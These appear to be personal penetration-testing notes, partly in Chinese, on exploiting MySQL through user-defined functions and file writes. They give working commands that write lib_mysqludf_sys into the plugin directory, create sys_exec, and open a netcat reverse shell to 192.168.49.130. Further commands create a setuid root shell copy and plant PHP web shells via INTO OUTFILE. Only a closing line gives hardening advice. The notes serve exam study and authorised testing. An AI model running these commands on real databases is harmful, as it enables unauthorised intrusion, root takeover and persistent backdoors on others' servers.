### mysql-udf [FreeBuf网络安全行业门户](https://m.freebuf.com/articles/database/291175.html) https://github.com/1N3/PrivEsc/blob/master/mysql/raptor_udf2.c ``` mysql配置文件secure_file_priv项设置为空,(如果为NULL或/tmp/等指定目录,即无法自定义udf文件导出位置,则无法利用); show variables like '%plugin%'; show variables like '%basedir%'; 查mysql安装位置 select * from mysql.user where user = substring_index(user(), '@', 1)\G; 查看权限 show variables like '%secure%'; 查可导出位置 secure_file_priv show variables like '%secure%'; SELECT @@GLOBAL.secure_file_priv; show variables like '%secure_file_priv%'; ? <5 没有? select @@version_compile_os, @@version_compile_machine; show variables like '%compile%'; ``` cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user" >5.0 ``` use mysql; create table trenchesofit(line blob); insert into trenchesofit values(load_file('/var/www/html/lib_mysqludf_sys_64.so')); insert into trenchesofit values(load_file('/tmp/lib_mysqludf_sys_64.so')); select * from trenchesofit into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so' create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'; select sys_exec('nc -e /bin/sh 192.168.49.130 22'); DROP TABLE tmp; CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; //导入udf函数 drop function sys_eval; ``` <5.0 ``` select * from trenchesofit into dumpfile '/usr/lib/mysq/lib_mysqludf_sys_64.so'; ______________________没有mysql时,通过SHOW Grants;show variables; 来获取各种版本信息,主要关注 hostname plugin_dir tmpdir version_compile_machine xxd -p lib_mysqludf_sys.so | tr -d '\n' > lib_mysqludf_sys.so.hex 注意这里hex需要0x ___ select @@plugin_dir select binary 0xshellcode into dumpfile '@@plugin_dir/lib_mysqludf_sys_64.so'; create function sys_exec returns int soname 'lib_mysqludf_sys_64.so'; select * from mysql.func where name='sys_exec' \G select sys_exec('cp /bin/sh /tmp/; chown root:root /tmp/sh; chmod +s /tmp/sh') ``` oscp教程里的例子 -> 针对mria db ``` git clone https://github.com/mysqludf/lib_mysqludf_sys.git gcc -Wall -I /usr/include/mysql -I. 
-shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so 换成 gcc -Wall -I /usr/include/mariadb/server -I/usr/include/mariadb/ -I/usr/include/mariadb/server/private -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so ``` #### MYSQL-write-shell ``` SELECT "<?php system($_GET['c']); ?>" into outfile "/var/www/html/sh3ll.php" select grantee, table_schema, privilege_type FROM schema_privileges;#Exact privileges select user,file_priv from mysql.user where user='root';#File privileges select load_file() select1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php' ``` 需要满足:show variables like '%secure%'; 查到的 secure_file_priv 不为 NULL(为 NULL 时服务器禁用导入导出;为空字符串时不限制目录;为指定目录时只能在该目录内读写)。加固时应将 secure_file_priv 设为 NULL 或专用目录,并且不给应用账号授予 FILE 权限。